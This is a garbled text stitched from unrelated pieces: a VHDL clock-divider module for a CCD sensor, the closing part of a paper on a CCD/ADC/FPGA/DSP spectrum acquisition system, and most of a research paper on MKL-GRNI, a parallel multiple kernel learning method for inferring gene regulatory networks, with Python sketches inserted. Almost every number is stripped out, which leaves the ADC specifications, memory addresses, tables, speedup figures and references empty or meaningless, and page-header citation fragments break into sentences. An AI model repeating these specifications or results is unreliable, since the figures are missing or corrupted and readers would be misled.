use ieee.std_logic_1164.all;
use ieee.numeric_std.all;

entity clk_divide_rog is
  port(clk_in  : in  std_logic;    -- ccd pixel clock
       rog_out : out std_logic);   -- rog pulse output (port name assumed)
end entity clk_divide_rog;

architecture behave of clk_divide_rog is
  signal rog_reg : std_logic := '1';
  signal div_cnt : unsigned(11 downto 0) := (others => '0');
  -- the two thresholds are assumed illustrative constants; the original
  -- values (rog low width and frame length in clock cycles) are device specific.
  constant rog_low_end : unsigned(11 downto 0) := to_unsigned(4, 12);
  constant frame_end   : unsigned(11 downto 0) := to_unsigned(2100, 12);
begin
  process(clk_in)
  begin
    if rising_edge(clk_in) then
      div_cnt <= div_cnt + 1;
      if div_cnt <= rog_low_end then
        rog_reg <= '0';                  -- active-low rog pulse at frame start
      elsif div_cnt < frame_end then
        rog_reg <= '1';                  -- rog stays high for the rest of the frame
      else
        div_cnt <= (others => '0');      -- frame finished, restart the counter
      end if;
      rog_out <= rog_reg;
    end if;
  end process;
end architecture behave;

. ccd, adc, fpga and dsp hardware interface
figure shows the important wire connections between the ccd, adc, fpga and dsp that are associated with transferring the sampled data. the ad adc chip is selected; it is a bit high-performance sar adc with an snr of db at msps, a supply of only . v, a differential input range of ± . v and a power consumption of only mw. these features make it especially well suited for portable and handheld raman optical analysis instruments. in this design the adc is set to bit parallel mode and the sampling mode is set to normal ( . msps). the tms vc a has an external memory interface (emif) for sram and sdram and six dma controllers; its external memory space is divided into regions by ce ~ce . in this design, ce selects the memory space from address x to xc , so the external memory space from x to x ( bytes in total) is used as the fifo source address, and the internal sram from x to x is assigned as the dma destination memory space.

fig. . ccd, adc, fpga and dsp interface. fig . optical spectrum sampling display.

figure shows the optical spectrum waveform of a nm laser source. this waveform indicates that the data sampling of the whole system succeeds and that the optical spectrum data can be transmitted quickly to a pocket pc through usb . .

. conclusions
since an fpga is based on sram field-programmable logic, fifo rams of different sizes and depths can be built inside it. using the fpga, the various ccd timing control signals can be created flexibly; for a ccd with a different clock frequency, only the adc with the corresponding conversion speed and the fifo read and write clock frequencies need to be changed, and the adc samples can still be transferred quickly to the dsp internal sram while the dsp runs real-time algorithms and then forwards the data to the pc through its usb port. this design therefore provides a comprehensive optical spectrum data acquisition method.

reference
[ ] using ti fifos to interface high-speed data converters with ti tms dsps, robert finger, ti application report sdma , june .
[ ] designing with ti sn v x fifo programmable flags, gary khazan and clayton gibbs, may .
[ ] altera cyclone fpga family datasheet, altera corporation, may .
[ ] tms vc / / / dsp direct memory access (dma) controller reference guide, literature number spru e, ti, jan. .
[ ] sony ilx datasheet.
[ ] ad datasheet, analog devices inc.
[ ] vhdl hardware description language and digital logic circuit design, hou baihen, gu xin.

mkl-grni: a parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks
nisar wani and khalid raza
govt. degree college baramulla, jammu & kashmir, india
department of computer science, jamia millia islamia, new delhi, india

abstract
high throughput multi-omics data generation coupled with heterogeneous genomic data fusion is defining new ways to build computational inference models. these models are scalable and can support very large genome sizes, with the added advantage of exploiting additional biological knowledge from the integration framework. however, the limitation of such an arrangement is the huge computational cost involved when learning from very large datasets in a sequential execution environment. to overcome this issue, we present a multiple kernel learning (mkl) based gene regulatory network (grn) inference approach wherein multiple heterogeneous datasets are fused using the mkl paradigm. we formulate the grn learning problem as a supervised classification problem, whereby genes regulated by a specific transcription factor are separated from other non-regulated genes. a parallel execution architecture is devised to learn a large-scale grn by decomposing the initial classification problem into a number of subproblems that run as multiple processes on a multi-processor machine. we evaluate the approach in terms of increased speedup and inference potential using genomic data from escherichia coli, saccharomyces cerevisiae and homo sapiens. the results demonstrate that the proposed method exhibits better classification accuracy and enhanced speedup compared to other state-of-the-art methods while learning large-scale grns from multiple and heterogeneous datasets.

subjects bioinformatics, computational biology, data mining and machine learning
keywords gene regulatory networks, grn inference, large-scale grn, systems biology, network biology

introduction
the problem of understanding gene interactions and their influence through network inference and analysis is of great significance in systems biology (albert, ). the aim of this inference process is to establish relationships between genes and construct a network topology based on the evidence provided by different data types. among various network inference studies, gene regulatory network inference (grni) has remained of particular interest to researchers, with extensive scientific literature generated in this domain. gene regulatory networks (grns) are biological networks where genes serve as nodes and the edges connecting them serve as regulatory relations (lee et al., ; raza & alam, ). standard methods for grn inference such as relnet
(butte & kohane, ), aracne (margolin et al., ), clr (faith et al., ), sirene (mordelet & vert, ) and genie (huynh-thu et al., ) mostly use transcriptomic data for grn inference. among these methods, our approach is modeled along the same principle as sirene. sirene is a general method to infer unknown regulatory relationships between known transcription factors (tfs) and all the genes of an organism. it uses a vector of gene expression data and a list of known regulatory relationships between known tfs and their target genes. however, integration of this data with other genomic data types such as protein-protein interaction (ppi), methylation expression, sequence similarity and phylogenetic profiles has drastically improved grn inference (hecker et al., ). a comprehensive list of state-of-the-art data integration techniques for grn inference has been reviewed in (wani & raza, a). in this article, we aim to integrate gene expression, methylation expression and tf-dna interaction data using the multiple kernel learning (mkl) library provided by the shogun machine learning toolbox (sonnenburg et al., ) and design an algorithm to infer gene regulatory networks (grns). besides, we also integrate ppi data and other data, such as gene ontology information, as sources of prior knowledge to enhance the accuracy of network inference. the problem of network inference is modeled as a binary classification problem whereby a gene being regulated by a given tf is treated as a positive label and negative otherwise. to infer a large-scale network, the mkl model needs to be trained for each tf with a set of known regulations for the whole genome. given n tfs, we need to train n different classification models individually and then combine the results from these models for a complete network inference task. as the number of tfs increases, the number of classification models also increases, creating resource deficiency and long execution times for the inference algorithm. the proposed approach attempts to solve this problem by distributing these classification models to different processors on a multi-processor hardware platform using a parallel processing library from python. the results from these models are stored in a shared queue object, which is later used for network inference. a detailed description of the model is contained in the methods section.

related literature
an early attempt to learn and classify gene function from integrated datasets using kernel methods was carried out in pavlidis et al. ( ). they trained a support vector machine (svm) for gene function classification with a heterogeneous kernel derived from a combination of two different types of data (e.g., gene expression and phylogenetic profiles). since an svm does not learn from multiple kernel matrices simultaneously, they proposed three different ways to fuse two datasets and referred to these fusion methods as (i) early integration, (ii) intermediate integration and (iii) late integration. in early integration, feature vectors from heterogeneous data types are concatenated to build a single feature vector for a given set of genes.
this extended dataset is then transformed into a kernel matrix using appropriate kernel function and serves as an input to the svm model from where we can draw biological inferences. in the case of intermediate integration, the two datasets are first transformed into their respective kernel wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ matrices; subsequently these kernel matrices are added together to yield an integrated kernel for svm training. for late integration, the authors trained the svm models individually using the heterogeneous datasets. the probability scores which act as discriminant values obtained from separate svm models are then added together for gene function prediction. in fact, kernel-based methods as effective integration techniques were first proposed in lanckriet et al. ( ), wherein a -norm soft margin svm is trained for a classification problem, separating membrane proteins from ribosomal proteins. they combined heterogeneous biological datasets such as ppi, amino acid sequences and gene expression data characterizing different proteins by transforming them into multiple positive semidefinite kernel matrices using different kernel functions. their findings reveal an improved classifier performance when all datasets are integrated as a unit compared to testing the classifier on individual datasets. in an earlier study (lanckriet et al., ) on function prediction for baker’s yeast proteins, they trained an svm classifier with multiple datasets of different types and achieved an improved performance over a classifier trained using single data type. in yet another study for network inference using kernel data integration (yamanishi, vert & kanehisa, ), the authors fused four different datasets, namely gene expression data, protein interaction data, protein localization data and data from phylogenetic profiles. these datasets are transformed into different kernel matrices. datasets comprising of gene expression, protein localization and data from phylogenetic profiles were kernelized using gaussian, polynomial and linear kernel functions. graph datasets were kernelized using diffusion kernel (kondor & lafferty, ). this study compared both unsupervised and supervised inference methods on single and integrated datasets. to assess the accuracy of the methods, the inferred networks are compared with a gold standard protein network. contrary to the unsupervised approaches, the supervised approach seems to make interesting predictions and capture most of the information from the gold standard. they observed that data from transcriptomic and phylogenetic profiles seem to contribute with an equal quantum of information followed by noisy ppi and localization data. applying a supervised approach to integrated datasets seems to produce overall best results, therefore highlighting the importance of guided network inference from integrated prior biological knowledge. in another study, ben-hur & noble ( ) applied kernel methods to ppi studies and proposed a pair-wise kernel between two pairs of proteins in order to construct a similarity matrix. this pairwise kernel is based on three sequence kernels, a spectrum kernel, a motif, and a pfam kernel. 
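the three fusion schemes described above (early, intermediate and late integration) can be illustrated with a short sketch; the toy arrays and the scikit-learn svm below are stand-ins introduced only for illustration, not the data or the svm implementation used in the cited studies.

------- early / intermediate / late integration sketch (python, toy data)
import numpy as np
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.svm import SVC

rng = np.random.default_rng(0)
expr = rng.normal(size=(60, 40))     # toy gene expression features
phylo = rng.normal(size=(60, 25))    # toy phylogenetic profile features
y = rng.choice([-1, 1], size=60)     # toy function labels

# early integration: concatenate feature vectors, then build one kernel
early_k = rbf_kernel(np.hstack([expr, phylo]))

# intermediate integration: one kernel per dataset, added before training
inter_k = rbf_kernel(expr) + rbf_kernel(phylo)

# late integration: one classifier per dataset, discriminant values added
late_scores = sum(
    SVC(kernel="precomputed").fit(rbf_kernel(x), y).decision_function(rbf_kernel(x))
    for x in (expr, phylo)
)

clf = SVC(kernel="precomputed").fit(inter_k, y)   # classifier on the fused kernel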
they further extended this experiment to explore the effect of adding kernels from non-sequence data, such as gene ontology annotations, homology scores and mutual clustering coefficient (mcc) derived from protein interactions computed in each cross-validation fold. integrating these non-sequence features with the pairwise kernel resulted in improved performance than any method by itself. another integration and supervised learning method that uses mkl is the feature selection multiple kernel learning (fsmkl) proposed by seoane et al. ( ). the feature wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selection is performed on variable number of features per kernel, separating feature sets from each data type with greater relevance to the given problem. the selection criteria uses statistical scoring by ranking features that are statistically aligned with the class labels and biological insights, where genes that are present in a specific pathway are chosen. they integrate gene expression, copy number variation and other genomic data from kegg pathway. these data are transformed into their base kernels and integrated using mkl framework into a combined kernel. the prior biological knowledge in the form of pathway information serves as central criterion for fsmkl to cluster samples. the authors claim that fsmkl performance is comparable to the other state-of-the-art breast cancer prognosis methods from dream challenge. speicher & pfeifer ( ) adopted an unsupervised approach to discover cancer subtypes from an integrated kernel using mkl. the proposed method called regularized mkl locality preserving projections (rmkl-lpp) integrates multi-omics data such as gene expression, dna methylation and mirna expression profiles of multiple cancer types from tcga (tomczak, czerwińska & wiznerowicz, ). this regularized version extends the dimensionality reduction variant of the mkl technique (mkl-dr) proposed by yan et al. ( ). the regularization term allows to use different types of kernels during optimization process and also avoids overfitting. they cluster the samples by applying k-means on the distance summation of each sample’s k-nearest neighbors by applying locality preserving projections (lpp). also many approaches have been proposed for parameter estimation of such large-scale and integrated models. besides, cross validation, grid search and randomised parameter optimization methods (remli et al., ) have proposed a cooperative enhanced scatter search for parameter for high dimensional biological models. their proposed method is executed in a parallel environment and can be faster than other methods in providing accurate estimate of model parameters. multiple kernel learning approach has also been applied to the domain of drug- target interaction network inference and drug bioactivity prediction. for drug-target interaction prediction, nascimento, prudêncio & costa ( ) proposed a new mkl based algorithm that selects and combines kernels automatically on a bipartite drug-protein prediction problem. their proposed method extends the kronecker regularized least squares approach (kronrls) (van laarhoven, nabuurs & marchiori, ) to fit in a mkl setting. the method uses l regularization to produce a non-sparse combination of base kernels. the proposed method can cope with large drug vs. 
target interaction matrices; does not require sub-sampling of the drug-target network; and is also able to combine and select relevant kernels. they performed the comparative analysis of their proposed method with top performers from single and integrative kernel approaches and demonstrated the competitiveness of kronrls-mkl to all the evaluated scenarios. similarly for drug bioactivity prediction (cichonska et al., ) proposed pairwise mkl method in order to address the scalability issues in handling massive pairwise kernel matrices in terms of both computational complexity and memory demands of such prediction problems. the proposed method has been successfully implemented to the drug bioactivity inference problems and provides a general approach other pairwise mkl spaces. wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since mkl is applied to solve large scale learning problems, various efforts have been undertaken to devise a scheme whereby mkl algorithm can be run in a multiprocessor and distributed computational environment. the authors in chen & fan ( ) have proposed a parallel multiple kernel learning (pmkl) using hybrid alternating direction method multipliers (h-admm). the proposed method makes the local processors to co-ordinate with each other to achieve the global solution. the results of their experiments demonstrated that pmkl displays fast execution times and higher classification accuracies. another important study to address the scalability and computational requirements in the domain of large scale learning has been carried out by alioscha-perez, oveneke & sahli ( ). they proposed svrg-mkl an mkl solution with inherent scalability properties that can combine multiple descriptors involving millions of samples. they conducted extensive experimental validation of their proposed method on several benchmarking datasets confirming a higher accuracy and significant speedup for svrg-mkl. in one of our recent works, we proposed a data fusion and inference model, called imtf-grn, based on non-negative matrix tri-factorization that integrates the diverse types of biological data (wani & raza, b). the advantage of our proposed parallel mkl-grni approach is that it is simple to implement and does not need complex coding to distribute multiple classification problems in a multiprocessor environment. our method employs shared queue objects for distributing inputs and collecting outputs from multiple processors compared to pmkl (chen & fan, ) where multiple processors are explicitly made to co-ordinate using the hybrid alternating direction method of multipliers (h-admm) introducing complexity and an added computational overhead. also, we chose basic addition operation to fuse multiple kernels compared to kron-rls mkl (cichonska et al., ) method, where the fusion of multiple kernels is achieved by performing kronecker product operation which requires calculating the inverse of individual kernels, hence a computational overhead compared to a basic arithmetic operation. also for mkl implementation, we used the shogun toolbox, which is a highly optimized, stable and efficient tool developed in c++ by sonnenburg et al. ( ) making it a suitable candidate for computing-intensive and large-scale learning problems. materials and methods the proposed method adopts a supervised approach to learn new interactions between a tf and the whole genome of an organism. 
the algorithm operates on multiple datasets that characterize the genes of an organism. since we are adopting an integrated approach, datasets such as gene expression, known tf-gene regulations, ppi, and dna-methylation data can be combined using mkl approach. all these datasets are carefully chosen owing to their role in gene regulation. the tf-gene interaction data serves a dual purpose. it supplies the algorithm with prior knowledge about the regulatory relationships, and for each tf, the known target gene list also form the labels for the mkl classifier. for each tf, a set of known gene targets serve as positive examples. for negative examples, we divide our input into two subsets; the mkl classifier is trained using positive examples for which no prediction is needed, and the other subset contains wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ negative examples. we perform -fold cross-validation using the same scheme and obtain discriminant values for all the genes with no prior regulation knowledge for this tf. this whole procedure is repeated for all the tfs. the idea here is to identify the set of genes whose expression profiles match those of positive examples even though the classifier is supplied with some false negative examples in the training set. a graphical overview of this architecture is depicted in fig. . the problem of grn inference from integrated datasets through supervised learning using mkl is not a trivial task. the nature of the complexity raises manifold while considering grn inference of organisms with large genomes sizes. in this scenario, the model training and testing becomes tf specific. therefore, the inference problem is decomposed into a set of classification subproblems corresponding to the total number of tfs present in the input gene-tf interaction matrix. a sequential approach to such a problem scenario would require to run each subproblem one after the other in a loop. however, as we increase the number of tfs, the execution time of the algorithm also increases. to overcome such problems, we devise a strategy of parallel execution for the algorithm wherein multiple subproblems run simultaneously across different processors of a multi-processor hardware platform as explained in algorithm . outputs generated by each model in the form of confidence scores (probability that a given tf regulates a gene) are stored in a shared queue object. once all the subproblems finish their execution, the shared object is iterated to collect the results generated by all the models in order to build a single output matrix. in case the number of tfs is more than the number of available processors, they are split into multiple groups and dispatched to each processor with the condition that the number of tfs are divided in such a manner so that all the processors receive equal number of classification models. figure application architecture of mkl-grni (a) combined kernel (b) decomposed regulation matrices (c) parallel distribution and model building (d) model execution (e) writing results to shared object. full-size doi: . /peerj-cs. /fig- wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
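the decomposition and shared queue described above map naturally onto python's multiprocessing primitives. the sketch below is a simplified stand-in for the actual shogun based implementation: train_one_tf is a hypothetical placeholder for the per-tf mkl classifier, and regulation is assumed to map each tf name to its +1/-1 label vector.

------- parallel per-tf dispatch sketch (python, simplified stand-in)
import multiprocessing as mp
import numpy as np

def train_one_tf(tf_name, combined_kernel, labels):
    # hypothetical placeholder for one tf-specific mkl classification model;
    # it should return a vector of decision scores over all genes.
    return np.zeros(combined_kernel.shape[0])

def worker(tf_batch, combined_kernel, regulation, out_queue):
    # each process handles its share of tfs and pushes results to a shared queue
    for tf_name in tf_batch:
        scores = train_one_tf(tf_name, combined_kernel, regulation[tf_name])
        out_queue.put((tf_name, scores))

def infer_network(tfs, combined_kernel, regulation, n_procs=4):
    queue = mp.Queue()
    batches = [tfs[i::n_procs] for i in range(n_procs)]   # balance tfs across cpus
    procs = [mp.Process(target=worker, args=(b, combined_kernel, regulation, queue))
             for b in batches if b]
    for p in procs:
        p.start()
    results = {}
    for _ in range(len(tfs)):            # drain the queue before joining
        tf_name, scores = queue.get()
        results[tf_name] = scores
    for p in procs:
        p.join()
    # assemble a genes x tfs matrix of decision scores
    return np.column_stack([results[tf] for tf in tfs])

# infer_network would be called under "if __name__ == '__main__':" in a script.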
kernel methods for genomic data fusion
kernel methods represent a mathematical framework which embeds data points (genes, proteins, drugs, etc.) from an input space i into a feature space f by employing a kernel function. genomic datasets, viz. mrna expression levels from rna-seq, dna methylation profiles and the tf-gene regulation matrix obtained from different databases, comprise heterogeneous datasets that can be fused using kernel methods and serve as the building blocks for inference of gene regulatory networks. a modular and generic approach to pattern analysis, kernel methods can operate on very high dimensional data in feature space by performing an inner product on the input data using a kernel function (shawe-taylor & cristianini, ). an algorithm is devised that can work with such data and learn patterns. such an algorithm is more generic, as it operates on any data type that can be kernelized. these kernels are data specific, such as gaussian, polynomial and sigmoid kernels for vectorial data, diffusion kernels for graph data, and string kernels for different types of sequence data. the kernel part is data specific, creating a flexible and modular approach to combine multiple modules to obtain complex learning systems. a graphical depiction of this fusion technique is shown in fig. . the choice of different kernel functions for transforming datasets into their respective kernel matrices is made after a thorough analysis of the literature in the field of kernel methods and mkl methods.

algorithm : mkl-grni parallel approach for supervised inference of large-scale gene regulatory networks
input: k datasets d , d , ..., dk
input: regulation binary matrix r for classification labels
output: a matrix of decision scores ds for tf-gene interactions
begin
  transform d , d , ..., dk into kernels k , k , ..., kn using appropriate kernel functions
  fuse the n kernels as k = k + k + ... + kn
  define mkl parameters params (c, norm, epsilon)
  /* distribute source tfs among multiple cpus */
  foreach cpu in the cpu list do in parallel
    foreach tf in the source tf list do
      /* set mkl parameters and data */
      set mkl.kernel ← k
      set mkl.labels ← r
      set mkl.parameters ← params
      /* obtain decision scores between each tf and all genes in the genome */
      ds_tf ← applymkl()
    end
    put ds_tf in queue q
  end
  foreach item in queue q do
    ds_tf ← item.val
  end
end

mkl model
multiple kernel learning is based on integrating many features of objects such as genes, proteins, drugs, etc., via their kernel matrices, and represents a paradigm shift from machine learning models built on a single kernel derived from one data type.

figure . genomic data fusion by combining kernel matrices from multiple kernels into a single combined kernel.
the resultant kernel can be defined by the following equations, using k and k as candidate kernel matrices and ϕ (x) and ϕ (x) their corresponding embeddings in the feature space:

k = k + k

with the new induced embedding

ϕ(x) = (ϕ (x), ϕ (x))

given a kernel set k = {k , k , ..., km}, an affine combination of m parametrized kernels can be formed as

k = Σi=1..m μi ki

subject to the constraint that the weights μi are positive, that is, μi ≥ 0 for i = 1, ..., m. with these kernel matrices as input, a statistical classifier such as an svm separates the two classes using a linear discriminant by inducing a margin in the feature space. to find this discriminant, an optimization problem known as a quadratic program (qp) needs to be solved. qp belongs to a class of convex optimization problems, which are easily solvable. the shogun toolbox solves this mkl optimization problem using semidefinite programming (sdp), first implemented for mkl learning by lanckriet et al. ( ). based on this margin, svm algorithms are classified into hard margin, -norm soft margin and -norm soft margin svms. here we use the -norm soft margin svm and sdp for mkl optimization and classification from heterogeneous datasets, as explained in our earlier work on mkl for biomedical image analysis (wani & raza, ). a detailed literature on svm algorithms is covered in (scholkopf & smola, ).

datasets
to test the parallel mkl algorithm on multiple datasets, we downloaded gene expression data of escherichia coli and saccharomyces cerevisiae from the dream network inference challenge (marbach et al., ) along with their gold standard networks, and human breast cancer transcriptomic data from tcga. some prominent features of these data are shown in table . because the mkl paradigm provides the platform to fuse heterogeneous datasets, we downloaded ppi data for both e. coli and s. cerevisiae from the string database (szklarczyk et al., ). the ppi data is supplied as prior biological knowledge to the algorithm in order to improve its inference accuracy, as mkl can learn from multiple datasets. to supplement the human transcriptome with additional biological knowledge, we downloaded dna methylation expression data for all the genes in the transcriptome from the tcga broad institute data portal (https://gdac.broadinstitute.org/). the regulation data (i.e., known interactions between genes and tfs) for e. coli and s. cerevisiae were extracted from the gold standard networks provided in the dream dataset; however, for grn inference in humans, the regulation data has been collected from a number of databases that store tf-gene interaction data derived from chip-seq and chip-chip experiments. we collected a list of tfs from the encode data portal (https://www.encodeproject.org/) for which chip-seq experiments were carried out on mcf breast cancer cell lines across different experimental labs. the targets of these tfs were extracted from the encode (encode project consortium, ), tred (jiang et al., ) and trrust (han et al., ) databases.

hardware and software requirements
the hardware platform used in this study is an ibm system x m server that includes intel xeon processors with cores and a primary memory of gb, extendable to gb. the system supports a -bit memory addressing scheme with powerful . ghz/ mhz intel xeon processors, a mhz front-side bus (fsb) and an mb l cache (each processor is dual core and comes with × mb ( mb) l cache).
the system also supports hyper-threading for more efficient program execution. to exploit these multi-core and multi-threading features of the hardware, we used the python multiprocessing package to dispatch the different sub-problems across multiple cores of the computing system. the distribution of the learning sub-problems among the cores of a multi-core machine is demonstrated in fig. . for the fusion of multiple datasets we use the mkl approach, whereby the different datasets are first converted into similarity matrices (kernels) and then joined to generate a final integrated matrix for learning tf-gene targets. we use the mkl python library provided by the shogun machine learning toolbox to implement the proposed algorithm.

results
all the genomic datasets are transformed into their respective kernel matrices by using an appropriate kernel function. for example, datasets such as gene expression and dna methylation expression data are transformed using a gaussian radial basis function. the ppi data is converted into a diffusion kernel, k = e^(βh), where h = a − d is the negative laplacian derived from the adjacency and degree matrices of the ppi graph. the tf-target gene regulation data is organized as a binary matrix of labels (i.e., +1 and −1) with genes in rows and tfs in columns. the number of rows corresponds to the genome size of the organism and the number of columns corresponds to the total number of tfs being used for grn inference. an element of a column with value +1 signifies that gene gi is regulated by tfj, and −1 otherwise. such an organization of the regulation data allows us to use each column of the matrix as the label vector for an individual classification problem in a supervised learning environment.

table . dataset description of different organisms for supervised grn inference (columns: organism, genes, samples, transcription factors, known regulations, known targets; rows: e. coli, s. cerevisiae, homo sapiens).

we perform two sets of experiments with our proposed approach in order to evaluate the scalability and the inference potential of supervised learning from heterogeneous datasets using the mkl paradigm. our first experiment records the execution times required to learn from varying genome and sample sizes on single and multi-processor architectures, given a set of tfs. our second experiment focuses on the evaluation of the inference potential of this approach on different genome and sample sizes. since our problem of grn inference is complex, the experiment aims to evaluate the parallel nature of the mkl algorithm by decomposing the supervised inference of grns for multiple tfs into a number of subproblems and distributing them to multiple processors for parallel execution. varying the genome and sample sizes in these experiments evaluates how efficiently mkl based models scale to large genomes, where most of the grn models developed to date do not perform optimally, as reported in marbach et al. ( ). the proposed method is implemented in python and the code along with the data is available at https://github.com/waninisar/mkl-grni. to assess the performance of the parallel mkl-grni on the different genomes characterized by the datasets in table , we execute the algorithm and embed the required code for the evaluation metrics.
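the kernel transformations used above (a gaussian rbf kernel for expression-type data, a diffusion kernel k = e^(βh) for the ppi graph, and the ±1 label matrix) can be sketched with numpy/scipy as follows; the shogun toolbox is the library actually used here, so the helper functions and the gamma/beta values below are only illustrative assumptions.

------- kernel construction sketch (python, illustrative parameters)
import numpy as np
from scipy.linalg import expm
from sklearn.metrics.pairwise import rbf_kernel

def expression_kernel(x, gamma=0.005):
    # gaussian rbf kernel on a genes-by-features matrix; gamma is assumed
    return rbf_kernel(x, gamma=gamma)

def diffusion_kernel(adjacency, beta=0.1):
    # diffusion kernel k = exp(beta * h) with h = a - d, the negative laplacian
    degree = np.diag(adjacency.sum(axis=1))
    h = adjacency - degree
    return expm(beta * h)

def combined_kernel(kernels):
    # fuse base kernels by simple addition, as in the mkl model section
    return sum(kernels)

# toy usage: expr and meth are genes-by-samples arrays, ppi is a 0/1 adjacency
# matrix over the same genes, and each column of the regulation matrix gives
# the +1/-1 labels for one tf.
# k = combined_kernel([expression_kernel(expr), expression_kernel(meth),
#                      diffusion_kernel(ppi)])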
once the algorithm completes its execution run, all the essential metrics are recorded for further analysis. the metrics are computed to evaluate the capacity of our approach in terms of reduced computational cost and enhanced inference accuracy when dealing with complex and large-scale inference tasks. initially the algorithm is run in sequential mode for all the organisms for a set of tfs, and later in parallel mode on and cpus. performance metrics for all the datasets are plotted in fig. . a brief description of these performance metrics is given below.

speedup
we calculate speedup as a measure of the relative performance of executing our algorithm in sequential and parallel processing environments. the speedup is calculated as

s(j) = t(1) / t(j)

where s(j) is the speedup on j processors, t(1) is the time the program takes on a single processor and t(j) is the time it takes on j processors.

efficiency
efficiency is defined as the ratio of speedup to the number of processing elements (j cpus in our case). it measures the utilization of the computation resources as a fraction of time. ideally, in a parallel system, speedup is equal to j and efficiency is equal to 1. in practice, speedup is less than j and efficiency is between zero and one, depending on the effectiveness with which the processing elements are utilized. we calculate the efficiency e(j) on j processors as

e(j) = s(j) / j

redundancy
redundancy is computed as the ratio between the number of operations executed in parallel and sequential modes. it measures the required increase in the number of computations when the algorithm is run on multiple processors.

r(j) = o(j) / o(1)

quality
quality measures the relevance of using parallel computation and is defined as the ratio of the product of speedup and efficiency to the redundancy.

q(j) = s(j) x e(j) / r(j)

figure . performance metrics for the parallel mkl-grni algorithm: (a) speedup, (b) efficiency, (c) redundancy, (d) quality.

it is evident from fig. that there is a marked increase in the speedup as we move from sequential (single cpu) to parallel execution (i.e., and cpus). for the e. coli genome, with a sample size of and tfs used for inference, the algorithm shows a sharp speedup as we move from sequential execution to parallel execution on processors; however, when the number of processors is increased to , there is only a marginal increase in speedup for e. coli. on the other hand, a considerable increase in speedup is recorded for and processors on the larger genomes of s. cerevisiae and homo sapiens, suggesting an increase in the capacity of the parallel algorithm to reduce the execution times. regarding resource utilization with our parallel approach, the efficiency metric shows a considerable drop in the utilization of compute resources for all three datasets, because only a section of the algorithm runs in parallel. this can be inferred from the computed redundancy for sequential and parallel executions.
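the four metrics defined above reduce to a few lines of arithmetic; the helper below is a minimal sketch, and the example timings are made-up numbers rather than measurements reported here.

------- parallel performance metrics sketch (python, made-up timings)
def parallel_metrics(t1, tj, j, o1=None, oj=None):
    # speedup s(j) = t(1)/t(j), efficiency e(j) = s(j)/j,
    # redundancy r(j) = o(j)/o(1), quality q(j) = s(j)*e(j)/r(j)
    s = t1 / tj
    e = s / j
    r = (oj / o1) if (o1 and oj) else 1.0
    q = s * e / r
    return {"speedup": s, "efficiency": e, "redundancy": r, "quality": q}

print(parallel_metrics(t1=420.0, tj=130.0, j=4))   # e.g. 420 s sequential vs 130 s on 4 cpus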
the redundancy plot shows slight increase in terms of the computational cost incurred when running our computational problem in parallel, thereby suggesting less computational overhead as we switch from sequential to parallel mode of execution. to evaluate the relevance of parallel execution to our problem, we calculate quality metric for all the three datasets. from the barplots we can observe that parallel algorithms are less relevant when applied to smaller genomes as is evident in case of e. coli. but there is steady improvement in quality metric as move from s. cerevisiae to homo sapiens with relevance indicator high when yeast dataset is run on processors and human dataset on processors. these improvements in speedup and quality metrics when running the algorithm in parallel provides us with a framework to work with more complex datasets and organisms with large genome sizes to infer very large scale grns using a supervised approach. to assess the inference potential of this supervised method we compare the proposed approach with other methods that infer gene interactions from single and integrated datasets. initially we apply mkl-grni to dream e.coli data, we performed a -fold cross-validation to make sure that model is trained on all the known regulations. at each cross-validation step, important performance metrics such as precision, recall and f score are recorded and then averaged for the whole cross-validation procedure. we then compared our network inference method with inference methods that predict tf-target gene regulations, such as clr (faith et al., ) and sirene (mordelet & vert, ). the results are recorded in table . after running all the inference procedures, it is observed that the average precision , recall and f metrics generated by running mkl-grni is quite higher than those generated by other comparable methods. the improvement with mkl-grni can be attributed to the additional biological knowledge in the form of protein-protein interactions between e.coli genes to aid in the inference process. to test the proposed method on integrated data, we perform a fold cross-validation procedure on the input data. in this experiment, the known target genes of each organism as depicted in table are split into training and test sets. the model is trained on the features from the training set, and the network inference is performed between the genes in the test set, important evaluation metrics, such as precision, recall and f scores are recorded for each iteration and averaged across cross-validation runs. table summarizes wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these metric for varying genome and sample size for human breast cancer dataset and table contains results for all the three genomes. it is evident from these results that the mkl-grni algorithm scales well for higher genomes sizes. these metrics highlight the learning and inference potential of mkl. looking at table we observe an average recall of % and an average precision of % with an average f measure of % for a genome size of , and sample size of , with an increase in these metrics as we increase the sample size to and , respectively. however, as we start increasing the size of the genome, these metrics start a gradual decline for smaller sample size and again show a marginal increase as we increase the sample size for a fixed genome size. 
although there is no direct rule of determining the number of samples corresponding to the size of the genome in omics studies, the improvements in precision, recall and f measures suggests an improvement in learning and inference potential of mkl algorithm with an increase in the number of samples. also the tabulated metrics for all the three genomes in table show a considerable decline table average precision, recall and f measures for various inference methods. method average precision average recall average f score clr . . . sirene . . . mkl-grni . . . table precision, recall and f measure recorded for different combination of genome and sample sizes for breast cancer data. no. of genes no. of samples average recall average precision average f measure , . . . , . . . , , . . . , . . . , . . . , , . . . , . . . , . . . , , . . . table precision, recall and f measures averaged across cross-validation runs for complete genomes. organism no. of genes no. of samples avg. precision avg. recall avg. f measure e. coli , . . . s. cerevisiae , . . . homo sapiens , , . . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the evaluation metrics as we move from smaller to larger genomes, suggesting a decrease in inference potential of the algorithm for larger datasets. the possible decline in the performance metrics can be attributed to increase in the genome size as we move from simple prokaryotic to more complex eukaryotic genomes. this increase in the genome sizes versus the sample size leads to curse of dimensionality and therefore making difficult to learn properly from skewed datasets. we also compare our mkl-grni with a recently developed integrative random forest for gene regulatory network inference (irafnet) (petralia et al., ). we select dream datasets of e. coli and s. cerevisiae and integrate ppi and gene expression data from both datasets. for mkl we build gaussian and diffusion kernels from expression and ppi 